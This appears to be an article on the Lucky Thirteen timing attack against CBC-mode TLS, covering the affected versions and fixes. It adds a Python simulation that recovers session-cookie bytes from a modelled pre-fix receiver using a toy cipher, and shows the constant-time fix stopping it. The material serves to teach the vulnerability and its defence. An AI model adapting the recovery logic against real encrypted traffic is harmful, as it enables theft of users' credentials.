A flaw in the TLS protocol can be used to gain access to passwords and other personal information of users.
Kenny Paterson, a professor at Royal Holloway, University of London, and researcher Nadhem AlFardan have discovered a new vulnerability in the TLS protocol. The flaw, which the researchers named Lucky Thirteen and disclosed on February 4, 2013, can be used to gain access to passwords and other personal information of users of sites served over HTTPS.
Paterson and AlFardan said they could mount a man-in-the-middle attack to decrypt traffic. The vulnerability lies in how the server processes the encrypted records exchanged between the browser and the web server: the time the server needs to process a record and reject it differs by a few microseconds depending on the record's contents. By observing that difference, an attacker who intercepts the traffic can gradually recover the transmitted data in clear text.
The attacker modifies ciphertext blocks of a captured record and measures how long the server takes to determine that the record has been tampered with and reject it. That time depends on how many bytes the server feeds into its integrity check, which in turn depends on whether the tampered plaintext happens to end in valid padding, and the difference is enough to work out the content of the original message byte by byte. Measuring it accurately is difficult, however: network jitter and other noise mask the microsecond-scale difference, and each manipulated record causes the server to close the connection between the browser and the server.
The attacker therefore has to query the server again and again, each time re-sending a slightly modified version of the original encrypted message, much as the BEAST attack used a script in the browser to generate repeated requests containing the target data.
Paterson also said that in their current form these attacks are not a serious threat to the average user, but that over time they will become much more serious.
The researchers said that, working with OpenSSL, Google and Oracle, they have identified several ways to counter the attacks.
The attacks apply to TLS 1.1 and 1.2 and to DTLS 1.0 and 1.2; all TLS and DTLS versions that use CBC-mode ciphersuites are potentially vulnerable. The researchers tested the attack against OpenSSL and GnuTLS: against OpenSSL they achieved full recovery of the encrypted plaintext, against GnuTLS partial recovery. The attacks can be hindered by adding random delays to CBC decryption, or avoided by switching to RC4 or AES-GCM ciphersuites. Two caveats for practitioners: random delays only raise the number of samples an attacker needs, and the fix that OpenSSL shipped in 1.0.1d was instead to make CBC decryption take the same time whatever the padding says (a constant-time MAC check); and RC4 is no longer an acceptable alternative, since it was itself shown to be breakable later in 2013 and its use in TLS is prohibited by RFC 7465, so an AEAD ciphersuite such as AES-GCM is the right choice.
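The mechanism described above (tampering with ciphertext blocks, then watching how long the receiver takes before rejecting the record) together with the constant-time fix, as an added example that is not part of the article or of the researchers' own code. It is a Python simulation with these assumptions: a toy 4-round Feistel cipher built on SHA-256 stands in for AES so that it runs with the standard library alone; the exact number of SHA-1 compression-function calls made by the HMAC check stands in for the measured time (that count is what produces the microsecond difference); the forgeries are tried against one session, whereas a real server closes the connection on every rejected record, so each trial would need the same plaintext re-sent in a new session; and the receiver models the pre-fix OpenSSL logic in which bad padding is treated as zero-length padding. The keys, sequence number and HTTP request are constructed sample values, and every function name (server_check, forge, lucky13_recover and so on) is the example's own.

```python
import hashlib
import hmac

BLOCK = 16        # cipher block size, as for AES
MAC_LEN = 20      # HMAC-SHA1 tag length
HASH_BLOCK = 64   # SHA-1 compression block size
HEADER_LEN = 13   # TLS MAC header: seq(8) || type(1) || version(2) || length(2)


def xor(a, b):
    return (int.from_bytes(a, "big") ^ int.from_bytes(b, "big")).to_bytes(len(a), "big")


def _round(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key, blk):
    # Toy 4-round Feistel cipher (assumption: stands in for AES, stdlib only).
    left, right = blk[:8], blk[8:]
    for rnd in range(4):
        left, right = right, xor(left, _round(key, rnd, right))
    return left + right


def block_decrypt(key, blk):
    left, right = blk[:8], blk[8:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _round(key, rnd, left)), left
    return left + right


def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(xor(block_decrypt(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return b"".join(out)


def hmac_sha1_compressions(msg_len):
    """SHA-1 compression calls HMAC-SHA1 needs for a msg_len-byte message."""
    inner = -(-(HASH_BLOCK + msg_len + 9) // HASH_BLOCK)   # ipad block, message, hash padding
    outer = -(-(HASH_BLOCK + 20 + 9) // HASH_BLOCK)        # opad block, inner digest
    return inner + outer


def mac_header(seq, data_len):
    return seq.to_bytes(8, "big") + b"\x17\x03\x02" + data_len.to_bytes(2, "big")


def server_check(enc_key, mac_key, seq, record, constant_time=False):
    """Receiver side of a TLS 1.1/1.2 CBC record (explicit IV || ciphertext).
    Returns (accepted, compressions); the compression count is the stand-in for
    the time the receiver spends before rejecting the record."""
    pt = cbc_decrypt(enc_key, record[:BLOCK], record[BLOCK:])
    pad = pt[-1]
    padding_ok = pad + 1 + MAC_LEN <= len(pt) and pt[-(pad + 1):] == bytes([pad]) * (pad + 1)
    # Pre-fix behaviour: bad padding is treated as zero-length padding, so the
    # MAC runs over more bytes than when the padding happened to be valid.
    cut = len(pt) - (pad + 1 if padding_ok else 0)
    data, tag = pt[:cut - MAC_LEN], pt[cut - MAC_LEN:cut]
    expected = hmac.new(mac_key, mac_header(seq, len(data)) + data, "sha1").digest()
    accepted = padding_ok and hmac.compare_digest(tag, expected)
    # Fixed receivers (OpenSSL 1.0.1d) add dummy compressions so the total always
    # equals that of the longest possible data, whatever the padding said.
    maced = len(pt) - MAC_LEN if constant_time else len(data)
    return accepted, hmac_sha1_compressions(HEADER_LEN + maced)


def forge(prev_ct, target_ct, delta):
    """4-block record whose last plaintext block decrypts to P* xor delta, where P*
    is the victim plaintext behind target_ct (CBC: P* = D(target_ct) xor prev_ct).
    The zero IV and two zero blocks in front simply decrypt to garbage."""
    return bytes(3 * BLOCK) + xor(prev_ct, delta) + target_ct


def lucky13_recover(oracle, prev_ct, target_ct):
    """Recover P* from oracle(record) -> compression count.  A 64-byte plaintext that
    ends in valid padding of two or more bytes is MACed over at most 55 bytes
    (4 compressions); any other outcome costs 5.  Single-session model: a real
    server closes the connection on every rejected record."""
    known = b""
    while len(known) < BLOCK:
        k = len(known)
        need = 2 if k == 0 else 1   # one-byte padding (00) costs 5 too, so start with two bytes
        v = k + need - 1            # padding byte value aimed for; padding length is v + 1
        for g in range(256 ** need):
            guess = g.to_bytes(need, "big")
            delta = bytes(BLOCK - k - need) + guess + xor(known, bytes([v]) * k)
            if oracle(forge(prev_ct, target_ct, delta)) == 4:
                known = xor(guess, bytes([v]) * need) + known
                break
        else:
            raise RuntimeError("no short path observed: the receiver is not leaking")
    return known


# Constructed session and victim record (sample values, not captured traffic).
ENC_KEY, MAC_KEY, SEQ = b"enc-key-for-demo", b"mac-key-for-demo", 7
VICTIM_DATA = b"GET / HTTP/1.1\r\nCookie: session=7f3a9c2e1b; lang=en\r\n\r\n"


def make_victim_record():
    tag = hmac.new(MAC_KEY, mac_header(SEQ, len(VICTIM_DATA)) + VICTIM_DATA, "sha1").digest()
    pad = (BLOCK - 1 - len(VICTIM_DATA) - MAC_LEN) % BLOCK
    pt = VICTIM_DATA + tag + bytes([pad]) * (pad + 1)
    iv = hashlib.sha256(b"iv").digest()[:BLOCK]
    return iv + cbc_encrypt(ENC_KEY, iv, pt)


def oracle_for(constant_time):
    return lambda rec: server_check(ENC_KEY, MAC_KEY, SEQ, rec, constant_time)[1]


if __name__ == "__main__":
    rec = make_victim_record()
    prev, target = rec[2 * BLOCK:3 * BLOCK], rec[3 * BLOCK:4 * BLOCK]   # third plaintext block
    print(lucky13_recover(oracle_for(False), prev, target))
```

Run as a script it recovers the third plaintext block, the start of the session cookie value, using up to 2^16 trials for the last two bytes and at most 256 per byte after that, each trial being a rejected record. With constant_time=True the oracle returns the same count for every record and lucky13_recover finds no short path. A longer valid padding (for instance three 0x02 bytes) also takes the short path, so against real traffic the first step can give a false positive that the attacker has to re-check, and real measurements add network noise on top, which is why the article speaks of many repeated sends.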